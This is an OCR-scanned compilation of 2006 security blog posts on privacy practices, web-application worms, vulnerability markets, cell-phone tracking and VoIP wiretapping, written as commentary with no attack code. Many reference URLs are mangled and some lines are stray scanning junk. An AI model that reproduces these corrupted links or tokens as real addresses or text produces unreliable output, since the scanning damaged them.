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. http: //ddanchev. blogspot .com/2006/02/give-it-back. htm 


ttp://en.wikipedia.org/wiki/Classified_informatio 


_hetp://wwy novafactor con/ story antal story_ 14-4290) 
_http:/ adanchev blogspot. con/2006/01/personal-data-security-breaches. bial 
_hetp://www. privacyrights.org/ar/ChronDataBreaches hea 

| http: //adanchey blogspot. con/2006/09/are-cyber~criminals~or~bareaucrats_ bial 


ttp://www.bos.frb.org/consumer/identity/idtheft.ht 
ttp://ddanchev. blogspot .com/2006/04/heading- in-opposite-direction.htm 


. http: //ddanchev.blogspot.com/2005/12/insiders- insights-trends-and-possible.htm 


11. http: //www.fcw.com/article92668-03-20-06-Web 
. http: //news.zdnet .com/2100-9595_22-6048254. htm 


. http://www.sfgate.com/cgi-bin/article.cgi?file=/c/a/2006/04/11/MNGK317A641 . DT 


. http://www. latimes.com/news/nationworld/world/la-fg-drives25apr25 ,0, 1174262. story?track=tothtm 


15. http://www.kimsoft.com/polwar.htm 
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2.4.19 DIY Marketing Culture (2006-04-27 13:16) 


Problem - big name advertising agencies, and self forgotten copywriters easily turn into 
an obstacle for a newly born startup, the way marketing researchers can easily base your 
entire service/product development efforts on a single survey’s results. Generating content, 
thinking content is the king, trying to sense and understand your customers’ needs or where 
the market is heading to for the sake of responding with profitable propositions, | think is a 
self-centered, in-the-box mode of thinking that would cease to exist with customers becoming 
more informed. 


Solution - Don’t get too "product-concept" centered, instead solve a problem profitably 
and retain their satisfaction for as long as possible. Let your customers dictate the rules, and 
perhaps even generate your entire marketing promotional efforts themselves - literally. Did 
you know you could get yourself [1]custom printed MM’s? | recently found out | can, and I’m 
already expecting the packs. 


Or how the successfully positioned as a secure alternative to IE, FireFox browser actually 
invested pennies in [2]spreading the word about it? Moreover, a $5000 bounty can indeed 
promote creativity, given they are comfortable with the idea, and with the 280 user-generated 
ads generated at [3]FireFox Flicks | think they did it again, no wait, their users did it. Take your 
time to go through the flicks, it’s worthwhile. 


Question the concepts, rethink them, and disrupt with whatever the outcome. 


1. http://www.mymms.com/customprint/index.asp 
2. http: //www.spreadfirefox.com/ 
3. http://www.firefoxflicks.com/flicks/ 


2.4.20 A comparison of US and European Privacy Practices (2006-04-27 14:27) 


[1][2]A new study on "[3]US and European Corporate Privacy Practices" was [4]released two 
days ago, and as | constantly monitor the topic knowing EU’s stricter information sharing and 
privacy violations laws comparing to the U.S, thought you might find this useful. To sum up 
the findings : 
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"European companies are much more likely to have privacy practices that restrict or 
limit the sharing of customer or employees’ sensitive personal information and are also more 
likely to provide employees with choice or consent on how information is used or shared," said 
David Bender, head of White & Case’s Global Privacy practice." still at the "sharing sensitive 
information is bad" 


promotional stage, | feel the research reasonable points out the lack of a systematic 
technical approach, [5]bureaucracy can also be an issue, but with so many [6]CERTs in Europe 
there’s potential for lots of developments | think. Established in 2004, [7]ENISA is the current 
body overseeing and guiding the Community towards data protection practices - slowly, but 
steadily gaining grounds. 


"But the research also revealed that US companies are engaging in more security and 
control-oriented compliance activities than their European counterparts. As a result, US cor- 
porations scored higher in five of the eight areas of corporate privacy practice." - structured 
implementation on a technical level, that is people auditing networks and being accountable 
in case of not doing so, and privacy policies by default. A littlhe something bringing more 
insight from the [8]Safe Harbor framework : 


"The United States uses a sectoral approach that relies on a mix of legislation, regula- 
tion, and self regulation. The European Union, however, relies on comprehensive legislation 
that, for example, requires creation of government data protection agencies, registration of 
data bases with those agencies, and in some instances prior approval before personal data 
processing may begin." 


Of course there are differences and there should always be as they provoke construc- 
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tive discussions, but among the many well-developed survey questions, some made me a 
quick impression : 


"Is there a process for communicating the privacy policy to all customers and consumers?" 
Europe - 33 % United States - 69 % 


"Is privacy training mandatory for key employees (those who handle, manage or control 
personal information)?" Europe - 22 % United States - 62 % 


"Do you use technologies to prevent unauthorized or illegal movement or transfer of 
data or documents?" Europe - 17 % Unites States - 45 % 


"Will the company notify individuals when their personal information is lost or stolen?" 
Europe 33 % United States - 62 % 


Perimer based defenses naturally dominate as a perception of being secure, still, | feel 
that the growing infosec market and IT infrastructures in both the U.S and Europe would 
continue to fuel the growth of new technologies and also result in more informed decision 
makers - at the bottom line it’s always about a common goal and better information sharing. 
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5. http: //ddanchev. blogspot .com/2006/03/are-cyber-criminals-or-bureaucrats.htm 


6. http: //www.enisa.eu.int/doc/pdf/deliverables/enisa_cert_euromap_v1_2060210. pdf 


7. bttp://www.enisa.eu.int/ 
8. http://www. export .gov/safeHarbor/index.htm 


2.5 May 


2.5.1 April’s Security Streams (2006-05-02 11:39) 


[1]Hi folks, it’s about time to quickly summarize April’s Security Streams. As of today, my blog 
is officially six months old and the feeling of witnessing change and improvements has always 
been a pleasant one. Blogging "my way" takes a lot of time, that is, posts going beyond 
"preaching" but emphasizing on "teaching", a little bit of investigative research, full-disclosure, 
and constructive key points on emerging or possible future trends related to infosec. Thanks 
for everyone’s feedback, and actually reading not just going my posts as far as the average 
visitors’ time spent is concerned! 


1. "[2]Wanna get yourself a portable Enigma encryption machine?"Already sold, but 
auctioned on Ebay, it’s remarkable how the seller managed to preserve an original Enigma in 
such a condition, and the bids were worth it! 


2. "[3]The "threat" by Google Earth has just vanished in the air" Coming across Microsoft’s 
[4]Windows Live Local Street-Side Drive-by provoked contradictive thoughts, so I’ve decided 
to sum up recent ideas on the issue. The [5]use of public satellite imagery for conducting 
OSINT is inevitable, while on the other hand the providers are simply making the world a 
smaller place. It is also questionable whether potential terrorists are "abroad" or within the 
countries themselves, that is knowing each and every corner of a possible "attack location", 
but with the ability to syndicate and share maps it would be naive not to think that they way 
you chat, they also do, and the way you plan activities while "Zooming-out", they also do. 
At the bottom line, snooping from above might actually deal more with self-confidence than 
anything else. Have an opinion? Feel free to comment on the topic 


3. "[6]lnsider fined $870" [7]Virtual worlds are emerging and so are security techniques 
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to steal someone’s sword, be it through insiders, phishing, or trojan horse attacks. What’s 
important to keep in mind when it comes to insiders is that on the majority of occasions you’re 
are never aware that there’s an ongoing potential breach on its way, and moreover, that the 
quantitative losses due to insiders are totally based on a company’s sales projections, rather 
than successfully (if one can) measuring the value of intellectual property 


4. "[8]Securing political investments through censorship" We constantly talk on how the 
Internet is changing our daily lifes, our attitudes, and giving us the opportunity to tap into the 
biggest think-tank in the world - on the majority of occasions for free. Internet censorship is 
still a very active practice by well-known regimes, while this post was trying to emphasize on 
the current situation - securing political investments through censorship 


5. "[9]Heading in the opposite direction" Companies and financial institutions are the 
most often targets of phishing attacks, and it’s getting hard for them to both, convince 
their users and society that they’re working on fighting the problem, and most importantly 
where’s the real problem and how to fight it. In this post, | try to emphasize that building 
communications over a broken channel Bank2Customer over email is the worst possible 
strategy you could start executing. The irony in here is how in the way both, phishers and any 
bank in question may sometimes be using images stored on the banks server - altogether! 


6. "[10]IM me" a strike order" It’s a common myth that the military have came up with 
a Uber secret and secure communications network, going beyond the Internet. And while 
there’re such, they all suffer the same weakness, lack of usability, and budget deficits 
compared to IP based communications, that is the Internet. The post goes through research 
surveys on IMs in the military, and tries to bring more awareness on how age-old IM threats 
can easily exploit military IM communications as well 


7. "[11]Catching up on how to lawfully intercept in the digital era" On as daily basis we 
discuss security breaches, threats, privacy violations, whereas constantly misses the fact that 
there’s a practice called lawful interception, namely that even if the NSA’s domestic spying 
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program got so much attention and concerns, it doesn’t mean they aren’t going to continue 
keeping themselves up-to-date with what is going wherever OSINT, SIGINT and HUMINT are 
applicable. The bottom line is that a person behind a CCTV camera’s network is also under 
surveillance, so | advise you go through a very good resource on the topic, the [12]Surveillance 
and Society Journal 


8. "[13]On the Insecurities of the Internet" IP spoofing by default, DNS and BGP abuses, 
Distributed Reflection Denial of Service Attacks, are among the ones worth mentioning, while 
perhaps the biggest insecurity lies in the fact that the Internet we’re all striving to adapt for 
E-commerce and E-business, was developed as a scientific network we got used to so fast 


9. "[14]Distributed cracking of a utopian mystery code" Continuing the "distributed con- 
cepts" series of posts, this one deals with virtual worlds, and a wise idea on how to keep the 
players coming back for more - let them even bruteforce the next part of the puzzle 


10. "[15]Fighting Internet’s email junk through licensing" China’s Internet population is 
about to surpass the U.S one and it would continue to grow resulting in China becoming the 
"novice" king of insecure networks. Trying to centrally control soam, they you can control the 
flow of traffic going out and coming in the country is a typical, but weak approach that could 
have worked years ago aS no one needs a mail server to generate spam of phishing attacks 
these days. In respect to their concerns of users learning more about infosec, in China a cyber 
dissident is a heroic potential hacker, one that can easily bypass the Great Firewall and spread 
the word on how it can be done. As a matter of fact, PBS has done an outstanding job in their 
[16]Tank Man episode, and while many considered the Chinese students’ inability to recognize 
the [17]infamous photo, what they were actually afraid of is showing a face-gesture that they 
indeed recognized it - as they did of course. 


11. "[18]Would somebody please buy this Titan 1 ICBM Missile Base?" | think the buyer 
of this base should have better though of what he’s buying, or let’s just say how on Earth was 
he expecting to break-even given he missed the post-cold war momentum itself? It’s indeed 
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once in a lifetime purchase that you would think twice before not purchasing, and so | hope 
the auction would continue to attract visitors the way it is - high-profit margins whenever the 
momentum is lost is a "lost case" by itself 


12. "[19]Spotting valuable investments in the information security market" An in-depth 
post on current market and vendor trends, as well as more info on the, now fully realistic 
acquisition of SiteAdvisor my McAfee, something I’ve blogged about in [20]January. It’s great 
to know that both parties came across the posts themselves, and to witness how such a 
wide-scale community power, but still backed by technology, startup got so easily acquired. 
What the acquirer must now ensure, is that it doesn’t cannibalize the culture at SiteAdvisor - 
every day is a startup day for us type of attitude is a permanent generator of creativity and 
attitude 


13. "[21]Digital forensics - efficient data acquisition devices" A resourceful post men- 
tioning on the release of the CellDEK, no, it’s not a portable Djs one, but a acquisition device 
detecting over 160 cell phone models and having the capacity to simultaneously acquire it 
from numerous devices all at once. Virtual cyber crime is all about quality forensics, whereas 
different legislations and approaches for gathering and coordinating such data across various 
countries remains a problem 


14. "[22]The anti virus industry’s panacea - a virus recovery button" Try to get this on 
the Super Bowl and watch a generating falling for the lack of complexity in this "solution". 
Gratefully, | got many comments from readers with cheers on mentioning this and how useless 
the button is at the bottom line 


15. "[23]Why’s that radar screen not blinking over there?" Quite some [24]sites picked 
up the story, yet we can always question, and than again, so what? In a crucial situation a 
scenario like this could prove invaluable for the final outcome, but right now it’s just a PR 
activity from the other side of the camp. Symmetric warfare is a tangible defense/offensive 
concept, whereas asymmetric warfare is fully capable of balancing powers - to a certain 
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extend as no matter how much NCW you put on the ground, you would still need "tangible" 
forces on the finish line 


16. "[25]25 ways to distinguish yourself - and be happy?" A little bit of self-esteem is 
never too much and that’s what these series can help you with 


17. "[26]Wild Wild Underground" An in-depth summary of some findings | intended to 
post for quite some time, but didn’t have the time to. If you just take yourself some time to 
rethink over, you would hopefully realize that a [27]guy like this is capable of recruiting people 
who actually come up with their own algorithms - beyond their will in one way or another. 
Moreover, responding to comments | received, of course | did report the links, which are now 
down, as well as some of the forum posts | managed to digg. Ryan1918 is rather active though 


18. "[28]ln between the lines of personal and sensitive information" Government reclas- 
sification of documents isn’t the most pragmatic way, as these have already been online 
once, therefore someone out there still Keeps a copy, and is now more than ever motivated to 
disseminate it, given someone is trying to censor it. | feel a common structure of the different 
types of information, formal training for those dealing with that type of info etc. and putting in 
place risk management solutions, considering that humans are totally not to be trusted (are 
computers to be?) is a way to mitigate these risks. Trying to censor something you end up 
making it even more popular that it could have been without you censoring it, just a thought 


19. "[29]DIY Marketing Culture" Personalization and Customization are emerging by de- 
fault, and so is virtual viral marketing. In this post | mention the possibility to get your own 
custom MMs, and FireFox’s FireFlicks initiative 
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20. "[30]A comparison of US and European Privacy Practices" You can rarely come across 
a infosec survey with well formulated questions, ones that are the basis of a quality one. | 
think this company did a very good job in formulating and summarizing the outcome of a very 
trendy topic 


[31][32] 


Updated to add the averages for each month since I’ve started tracking my readers, 
looks nice, and in case you’re interested you can also go [33]through the [34]summaries of 
[35]previous months. 
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35. http: //ddanchev. blogspot .com/2006/03/marchs-security-streams.htm 


2.5.2 Biased Privacy Violation (2006-05-03 13:37) 


[1]This is a very interesting initiative, going beyond the usual [2]MySpace’s teen heaven 
[3]privacy issues, but directly exposing the mature audience in a way | find as a totally biased 
one. Girls writing stories on men that supposedly chated on them. [4]DontDateHimGirl.com 
aims to: 


"DontDateHimGirl.com is an online resource for women who have shared the experience 
of dating a no-good man! Browse our search engine of alleged cheaters, liars and cads right 
now! This controversial site has been featured on MSNBC, the Today Show, ABC News, CNN 
and Entertainment Tonight! There is finally a way for women to check a guy out BEFORE 
dating, marrying or otherwise committing to him! Warn other women about the men who 
have cheated, lied or used you! Register and become a member today! You'll receive our free 
newsletter and other valuable goodies! It’s fast, easy and best of all, it’s free! You'll be doing 
your sisters around the world an invaluable service! Don’t Date Him Girl!" 


Basically stuff like, "post a cheating man", "[5]search for a cheating man", or browse 
through the 3593 ones already "categorized" as cheaters with personal stories and photos 
whenever available. What | feel they shouldn’t do, is aggregate that kind of community 
powered personal details for third-parties, and making it searchable. Some stories are pretty 
fun and average enough to make you think : 


"Quite a charmer in the beginning, as all guys tend to be. Called me beautiful, gorgeous.. 
kissed my forehead.. He did all the right things. He could do no wrong. We "dated" for a good 
6 months, and things seemed to be going good. He was the love of my life. Lots of firsts with 
him, then he did a total 180. He stopped calling and didn’t respond to my phone calls and/or 
messages. | was so distraught. | thought I did something to fuck things up. " 
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Perhaps she did, didn’t she?! Still, that’s entirely between them given they actually re- 
spect each other. 


Don’t get me wrong, there are pathological polygamists, but what’s next, Local Google 
Maps to pin point the cheating areas around town? 


To balance the powers, and make it even worse there’s even a [6]DontDateHerMan.com 
coming along, but try not to bring your personal life stuff to such an end, or is it just me? :) 


1. 

2. http: //www.forbes.com/columnists/2006/04/25/myspace-kids-protection-cx_cw_0425myspace .htm 
3. 

a 

5 
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2.5.3 Travel Without Moving - Typhoon Class Submarines (2006-05-04 13:50) 


[1]In previous posts "[2]Security quotes : a FSB (successor to the KGB) analyst on Google 
Earth", "[3]Suri Pluma - a satellite image processing tool and visualizer", "[4]The "threat" by 
Google Earth has just vanished in the air" | talked about various issues related to satellite 
imagery and security. 


Moreover, I’m also actively covering various emerging [5]Space Warfare issues, and with 
the recent speculation that the [6]Okno ELINT complex in Tajikistan is becoming Russian and 
different "schools of thought", there’s a lot to come for sure. Google Maps/Earth did not only 
[7]restart the real estate industry, it made the world a smaller place, a more [8]competitive 
one, and hopefully a safer one if security counts here. 


As of today, | decided to start posting a weekly section, the "Travel Without Moving" se- 
ries, presenting interesting and publicly obtained imagery of sights that somehow made me 
an impression. The other day | came across to a (perhaps scraped by now) [9]Typhoon Class 
Submarines at [10]GoogleSightseeing.com - the largest and quietest types of submarines. 
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That’s perhaps the perfect moment to mention the cool pictures of a [11]Soviet Under- 
ground Submarine Base in the Nuclear Submarine Base that "Until the collapse of the Soviet 
Union in 1991 Balaklava was one of the most secret towns in Russia. 10km south eas of 
Sevastopol on the Black Sea Coast, this small town was the home to a Nuclear Submarine 
Base." Take a tour for yourself! 


1 icep/photost blogger .coa/blogger/i083/1778/1600/yphoon Class, Subnarines.jpg 
2. http: //ddanchev. blogspot . com/2006/01/security-quotes-fsb-successor-to-kgb. html 
3. http: //ddanchev. blogspot .com/2006/02/suri-pluma-satellite-image-processing .htm 
4. http: //ddanchev . blogspot . com/2006/04/threat-by- google- earth-has- just .html 

5. http: //ddanchev. blogspot . com/2006/04/threat-by-google-earth-has- just . htm] 

6. http: //enews.ferghana.ru/detail . php?id=95267645613 . 42, 338, 1135899 

7. http://www. housingmaps.. com/ 
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9. http: //en.wikipedia.org/wiki/Typhoon_class_submarine 


10. http://googlesightseeing.com/maps?p=&c=kamp ; amp; amp ; t=-k&h1=en&11=69 .434275 , 32.355123&%z=1 


11. http: //www.funmansion. com/html/fm-Soviet-Underground-Submarine-Base.htm 


2.5.4 The Current State of Web Application Worms (2006-05-04 14:50) 


[1]Remeber the most [2]recent [3]Yahoo! Mail’s XSS vulnerabilities, or the [4]MySpace worm? 
| just read through a well written summary on Web Application Worms by [5]Jeremiah Gross- 
man, from WhiteHat Security, "[6]Cross-Site Scripting Worms and Viruses - The Impending 
Threat and the Best Defense", an excerpt : 


"Samy, the author of the worm, was on a mission to be famous, and as such the pay- 
load was relatively benign. But consider what he might have done with control of over one 
million Web browsers and the gigabits of bandwidth at their disposal-browsers that were also 
potentially logged-in to Google, Yahoo, Microsoft Passport, eBay, web banks, stock brokerages, 
blogs, message boards, or any other web-based applications. It’s critical that we begin 
to understand the magnitude of the risk associated with XSS malware and the ways that 
companies can defend themselves and their users. Especially when the malware originates 
from trusted websites and aggressive authors. In this white paper we will provide an overview 
of XSS; define XSS worms; and examine propagation methods, infection rates, and potential 
impact. Most importantly, we will outline immediate steps enterprises can take to defend their 
websites." 


408 


It provides an overview of Cross-Site Scripting (XSS), Methods of Propagation, comments 
on the First XSS Worm, a worst case scenario, and of course protection methods, nice graphs 
and overview of this emerging trend. In my "[7]Future Trends of Malware" research | indeed 
pointed out on its emergence : 


"How would a malware author be able to harness the power of the trust established be- 
tween, let’s say, [8]JComScore’s top 10 sites and their visitors? Content spoofing is the where 
the danger comes from in my opinion, and obvious web application vulnerabilities, or any bugs 
whose malicious payload could be exposed to their audiences. In case you reckon, a nasty 
content spoofing on Yahoo!’s portal resulted in the following possibility for driving millions of 
people at a certain URL, if | don’t trust what | see on Yahoo.com or Google.com, why bother 
using the Net at all is a common mass attitude of course. Any web property attracting a 
relatively large number of visitors should be considered as a propagation vector, for both, 
malware authors, and others such as phishers, or botnet brokers for instance." 


[9] 


[10]Monetizing [11]mobile malware is among the other trends | also indicated, and the 
[12]RedBrowser seems to be the most recent example of this as it randomly chooses a 
premium-rate number from the following list, and sends a SMS message generating revenue 
for the attacker : 08293538938, 08001738938, 08180238938, 08229238938, 08441238938, 
08287038938, 08187938938, 08189038938, 08217838938, 08446838938. 


| summarized the key points back than as : 


"The number and penetration of mobile devices greatly outpaces that of the PCs. Mal- 
ware authors are actively experimenting and of course, progressing with their research on 
mobile malware. The growing monetization of mobile devices, that is generating revenues 
out of users and their veto power on certain occasions, would result in more development in 
this area by malicious authors. SPIM would also emerge with authors adapting their malware 
for gathering numbers. Mobile malware is also starting to carry malicious payload. Building 
awareness on the the issue, given the research already done by several vendors, would be a 
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wise idea." 


Among the first folks to discuss the topic of web application malware was Robert from 
CGlSecurity.com in his "[13]Anatomy of Web Application Worm" paper back in 2002, and with 
the easy and speed of discovering web application vulnerabilities in major portals it’s up to 
the imagination of the attacker - as the paper points out Samy only wanted to make 1 million 
friends, what if he wanted to do something else? 


[14] 


"[15]Cross-Site Scripting Worms and Viruses - The Impending Threat and the Best De- 
fense" also argues on Samy being the fastest worm, though single-packet UDP worms, 
according to a research on the "[16]Top Speed of Flash Worm" by "Simulating a flash version 
of Slammer, calibrated by current Internet latency measurements and observed worm packet 
delivery rates, we show that a worm could saturate 95 % of one million vulnerable hosts on the 
Internet in 510 milliseconds. A similar worm using a TCP based service could 95 % saturate 
in 1.3 seconds. The speeds above are achieved with flat infection trees and packets sent at 
line" rates. 


Is it the speed or the size of the infected targeted group that matters, and what if Web 
2.0 worms can achieve exactly the two of these? 


More resources on the topic in case you are interested : 
[17]Web-based Malware & Honeypots - [18]phpBB bots/worms 
[19]New MySpace XSS worm circulating 

[20]Description of a Yahoo! Mail XSS vulnerability 


[21]Evolution of Web-based worms 
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[22]The Latest in Internet Attacks: Web Application Worms 
[23]Web Application Worms : Myth or Reality? 
[24]Analysis of Web Application Worms and Viruses 


[25]Paros - for web application security assessment 
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ttp://www.securitypark.co.uk/article.asp?articleid=24240kCategoryID=1 


23. http://security-protocols.com/whitepapers/Application_Worms .pdf 


24. http://www.spidynamics.com/spilabs/education/presentations/billyhoffman-web_appworms_viruses.pdf 


25. http://www. parosproxy.org/index.shtm 


2.5.5 Shaping the Market for Security Vulnerabilities Through Exploit Derivatives 
(2006-05-08 20:47) 


In a previous post "[1]Obay - how realistic is the market for security vulnerabilities?" | gave a 


brief overview of the current market infomediaries and their position, listed various research | 
recommend you to go through, and speculated on an [2]Jauction based market model. 


During April, at the CanSecWest Security Conference "[3]Groups argued over merits of 
flaw bounties" some quotes : 
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"The only economic model that does not make sense to me is the vendor’s," Sutton 
said. "They get to know about a vulnerabilities ahead of time, but they are unwilling to pay 
for them." - Michael Sutton 


"What I can give people who find vulnerabilities is a small amount of fame. iDefense 
can give them $10,000." - Darius Wiles 


"As a civil rights issue, selling vulnerabilities is just fine. As a keeping-the-customers 
safe issue, it’s junk." - Novell director of software engineering Crispin 


"If | come to you and offer to sell you a vulnerability in your product, | am going to be 
cuffed and arrested," he told the representatives of software makers on the panel." - Matthew 
Murphy 


And the discussion is reasonably pretty hot with a reason. Back in January [4]Microsoft 
expressed their opinion on the informediaries based market model like : 


"One day after iDefense, of Reston, Va., announced the bounty as part of a newly imple- 
mented quarterly hacking challenge, a spokesperson for Microsoft,based in Redmond, Wash., 
said paying for flaws is not the best way to secure software products. "We do not believe that 
offering compensation for vulnerability information is the best way [researchers] can help 
protect customers," the spokesperson Said in a statement sent to eWEEK. " 
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and while Microsoft talks about responsible disclosure, that’s exactly the type of model | 
don’t really think exist anymore. [5]Peter Mell made a good point that "/ don’t support this 
activity. Basically, it enables third parties to unfairly focus attention on a particular vendor or 
product. It does not help security in the industry," Mell said in an interview with eWEEK." - but 
it still offers the opportunity to bring order into the chaos doesn’t it? 


The [6]WMF vulnerability apparently got purched for $4000 and | among the few scenar- 
ios that | mentioned were on vendors purchasing vulnerabilities and requested vulnerabilities, 
or a reverse model : 


"requested vulnerabilities are the worst case scenario | could think of at the moment. 
Why bother and always get excited about an IE vulnerability, when you know person/company 
X are running Y AV scanner, use X1 browser as a security through obscurity measure. That’s 
sort of reverse model compared to current one where researchers "push" their findings, what 
if it turns into a "pull" approach, "I am interested in purchasing vulnerabilities affecting that 
version of that software", would this become common, and how realistic is it at the bottom 
line?" 


Coming across [7]Oday vulnerabilities for sale, | also came across Rainer Boehme’s great 
[8]research on various market models, among them exploit derivatives. Have you ever though 
of using exploit [9]derivatives, on the called "[10]futures market"? | think the idea has lots of 
potential, and he described it as : 


"Instead of trading sensitive vulnerability information directly, the market mechanism is 
build around contracts that pay out a defined sum in case of security events. For instance, 
consider a contract that pays its owner the sum of 100 EUR on say 30 June 2006 if there exists 
a remote root exploit against a precisely specified version of ssh on a defined platform." 
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The OS/Vendor/Product/Version/Deadline type of reverse model that | also mentioned is 
a good targeted concept if it were used by vendors for instance, and while it has potential 
to have a better control over the market, the lack of common and trusted body to take the 
responsibility to target [11]Windows and [12]Apple 50/50 for istance, still makes me think. 
The best part is how it would motivate researchers at the bottom line - deadlines result in 
spontaneous creativity sometimes. 


More on the topic of security vulnerabilities and commercializing the market, in a great 
[13]article by Jennifer Granick (remember [14]Michael Lynn’s case?) [15]she said that : 


"I’m more concerned that commercialization, while it promotes discovery, will interfere 
with the publication of vulnerability information. The industry adopted responsible disclosure 
because almost everyone agrees that members of the public need to know if they are secure, 
and because there is inherent danger in some people having more information than others. 
Commercialization throws that out the window. Brokers that disclose bugs to their selected 
list of subscribers are necessarily withholding important information from the rest of the 
public. Brokers may eventually issue public advisories, but in the meantime, only the vendor 
and subscribers know about the problem." 


Who should be empowered at the bottom line, the informediaries centralizing the pro- 
cess, or the security researchers/vulnerability diggers starting to seek bids for their reseach 
efforts? 


On the other hand, | think that the current market model suffers from a major weakness 
and that is the need for achieving faster liquidity if we can start talking about such. 


Basically, sellers of vulnerabilities want to get their commissions as soon as possible, 
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which is where the lucrative underground market easily develops. While | am aware of cases 
where [16]insurers are already purchasing vulnerabilities to hedge risks until tomorrow | guess, 
anyone would put some effort into obtaining a critical MS vulnerability given a deadline and 
[17]hefty reward, but who’s gonna act as a social planner here? 


ttp://ddanchev. blogspot .com/2005/12/0bay-how-realistic-is-market-for.html 


ttp://www.cl.cam.ac.uk/~j0262/papers/weis04-ozment-bugauc. pdf 
ttp://www.theregister.co.uk/2006/04/06/vulnerability_purchasing debate/ 


. http://www.eweek.com/article2/0, 1895, 1928389, 00.asp 
. bttp://nvd.nist.gov/ 
. http: //ddanchev.blogspot .com/2006/01/was-wmf-vulnerability-purchased-for.htm 


ttp://ddanchev. blogspot .com/2006/03/wheres-my-Oday-please.htm 
ttp://events.ccc.de/congress/2005/fahrplan/attachments/542-Boehme2005_22C3_VulnerabilityMarkets. pdf 
ttp://en.wikipedia.org/wiki/Derivatives_market 


ttp://www.google.com/search?hl=en&lr=kq=def ine/3Afuturestmarket 


PH 
Hr oO 


ttp://ddanchev. blogspot .com/2006/03/5-things-microsoft-can-do-to-secure.htm 
ceo: ataachey Wlogspct con /206/00 exe plea only 1 isan notarial 
_hvtp://awsvired.con/nevs/cclumns/0 708440: nt 

{eae eT 

EERE ETT 


ttp://ddanchev. blogspot .com/2006/03/getting-paid-for-getting-hacked_17.htm 
ttp://ddanchev. blogspot .com/2006/02/how-to-win- 10000-bucks-until-end-of .htm 


PRPPrHeH 
AuBRWN 


py 
= 


2.5.6 The Cell-phone Industry and Privacy Advocates VS Cell Phone Tracking 
(2006-05-09 15:19) 


[1]l’ve once mentioned various [2]privacy issues related to mobile devices, the growing trend 
of "assets tracking", and of course, cell phones tracking. Yesterday | came across to great 
summary of the current situation - privacy groups make a point of it. From the [3]article : 


"Real-time tracking of cell phones is possible because mobile phones are constantly sending 
data to cell towers, which allows incoming calls to be routed correctly. The towers record 
the strength of the signal along with the side of the tower the signal is coming from. This 
allows the phone’s position to be easily triangulated to within a few hundred yards. But the 
legal grounds for obtaining a tracking order is murky - not surprising since technology often 
outpaces legislation. The panel agreed that Congress should write rules governing what level 
of suspicion cops need to have before tracking people through their cell phones." 


While on the other hand, there’s also an ongoing commercialization of the [4]service by 
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the industry itself, if the government were to start using practices like these with grey subpoe- 
nas, it would undermine the customers’ trust in the industry and BigBrother is going to get 
even bigger. Enthusiasts are already [5]experimenting with DIY cell phone tracking abilities, 
so if you worry about being tracked through your phone, you should also start worrying about 
having an extra one in your bag. Physical insecurities such as [6]digital forensics on cell 
phones, even [7]counter-offerings are today’s reality, while [8]flexible lawful wiretapping may 
still be taking one way or another - | guess the NSA got all the attention recently, with their 
domestic spying program. 


As the [9]Mindmaker pointed out, we must assume that we are trackable wherever we 
go, but | think this dependence would get even more abused in the future by the time 
proposed laws match with the technology. 
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2.5.7 Wiretapping VoIP Order Questioned (2006-05-09 20:17) 


[1]There’s been a lot of buzz recently on the FCC’s [2]Jorder [3]requiring all VoIP providers to 
begin compliance with [4]CALEA in order to lawfully intercept VoIP communications by the 
middle of 2007 . Yesterday, a U.S judge seems to have [5]challenged the order, from the 
article : 


"The skepticism expressed so openly toward the administration’s case encouraged civil 
liberties and education groups that argued that the U.S. is improperly applying telephone-era 
rules to a new generation of Internet services. "Your argument makes no sense,” U.S. Circuit 
Judge Harry T. Edwards told the lawyer for the Federal Communications Commission, Jacob 
Lewis. "When you go back to the office, have a big chuckle. I’m not missing this. This is 
ridiculous. Counsel!’ The Justice Department, which has lobbied aggressively on the subject, 
warned in court papers that failure to expand the wiretap requirements to the fast-growing 
Internet phone industry “could effectively provide a surveillance safe haven for criminals and 
terrorists who make use of new communications services.” 
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What’s worth mentioning is that on a wide scale VoIP services are often banned in many 
countries, ISPs don’t tend to tolerate the traffic which on the other hand directly bypasses 
their VoIP offers, and even [6]China, one of the largest telecom market continues to have 
[7]concerns about VoIP. Companies also seem to be [8]revising their practices while trying 
to block Skype, among the most popular VoIP applications. Rather interesting, T-Mobile just 
[9]Jannounced that it would ban VoIP on its 3G network, but is it inability to achieve compliance 
or direct contradiction with their business practices? 


Whatever the reason, [10]VoIP communications aren’t everyone's favorite, but represent 
a revolution in cheap, yet reliable communications. The more easily a network is made 
wiretap-ready, the easier for attackers in both, the short, and the long-term to abuse the 
backdoored idea itself, so don’t. You can actually go through the [11]2005’s Wiretap Report 
and figure out the cost of wiretapping, limiting it by promoting insecure networks isn’t going 
to solve anything, given you actually know what you’re [12]looking for at the bottom line. 


Image courtesy of EFF’s [13]"Monsters of Privacy" Animation. 


Related resources : 

[14]VoIP, FCC, CALEA 

[15]Communications Assistance for Law Enforcement Act and Broadband Access and Services 
[16]Secure VoIP - Zfone 

[17]Sniffing VoIP Using Cain 


[18]Oreka VoIP Sniffer 
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2.5.8 Snooping on Historical Click Streams (2006-05-11 12:16) 


In a previous post "[1]The Feds, Google, MSN’s reaction, and how you got "bigbrothered"? 
| gave practical advices on how can easily do your homework on the popularity of certain 
search terms and sites, without the need of issuing a subpoena. The other day, [2]AlltheWeb 
(Yahoo!) introduced their [3]Livesearch feature, seems nice, still it basically clusters possible 
opportunities. Now the interesting part, on the next day Google [4]launched [5]Google Trends 
which is : 


"builds on the idea behind the Google Zeitgeist, allowing you to sort through several 
years of Google search queries from around the world to get a general idea of everything 
from user preferences on ice-cream flavors to the relative popularity of politicians in their 
respective cities or countries." 


This is what I’ve been waiting for quite some time, and you can easily make very good 
judgements on key topics based on regions, languages, even cities - marketers get yourself 
down to business! 


[6]Antivirus, [7]Malware, [8]Spyware, [9]NSA, [10]Censorship, [11]Privacy 
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What’s next, the rise of [12]MyWare and its integration on the Web? Give a try to [13]Yahoo!’s 
Buzz, and [14]PacketStormSecurity’s instant StormWatch as well. 
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2.5.9 Pass the Scissors (2006-05-11 12:46) 


[1][2]Counterfeiting U.S currency is a profitable business given its stability and actual valua- 
tion, and so is [3]money printing! It’s just that sometimes there are too much legally printed 
money as well, and the [4]Fed is raising the interest rates for the sixteenth time during the 
last two years - which doesn’t stop it from making a buck in between. 


Did you know you could get [5]Uncut Currency sheets "of fresh crisp new $1.00, $2.00, 
$5.00, $10.00 and $20.00 greenbacks right off the press will delight someone special in your 
life. They make an especially unique gift for that "hard-to-buy-for" person." 


While | always joke that availability stands for temptation, that’s a "process utilization" 
worth envying, but too much money available [6]isn’t always a good thing. 
